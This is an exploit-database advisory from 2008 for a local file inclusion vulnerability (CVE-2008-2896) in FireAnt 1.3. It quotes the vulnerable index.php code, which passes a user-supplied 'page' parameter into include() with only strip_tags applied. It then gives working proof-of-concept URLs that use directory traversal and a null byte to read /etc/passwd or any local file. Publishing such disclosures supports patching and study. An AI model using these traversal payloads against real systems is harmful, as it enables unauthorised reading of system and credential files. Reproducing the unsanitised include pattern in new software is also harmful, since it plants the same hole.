FireAnt 1.3 - 'index.php' Local File Inclusion

Author: cOndemned
type: webapps
platform: php
port: 
date_added: 2008-06-19 
date_updated:  
verified: 1 
codes: OSVDB-46818;CVE-2008-2896 
tags: 
aliases:  
screenshot_url:  
application_url: 

###################################################################################
#
#   Name   : FireAnt v1.3 Local File Inclusion Vulnerability
#   Author : cOndemned
#   Dork   : use Your brain (:
#   Greetz : ZaBeaTy, str0ke, GregStar, irk4z, Sandtalker & Avantura ;**
#
###################################################################################

Source :

    // index.php

    8.      $page = "bug_list"; //default page
    9.      if (!empty($_GET['page'])) {
    10.         $page = strip_tags($_GET['page']);

    99.             if (file_exists("./".$page.".php")) {

    104.                include("./".$page.".php");


Proof of Concept :

    http://[host]/[FireAnt1.3]/index.php?page=../../../../etc/passwd%00
    http://[host]/[FireAnt1.3]/index.php?page=../../../../[local_file]%00

# milw0rm.com [2008-06-20]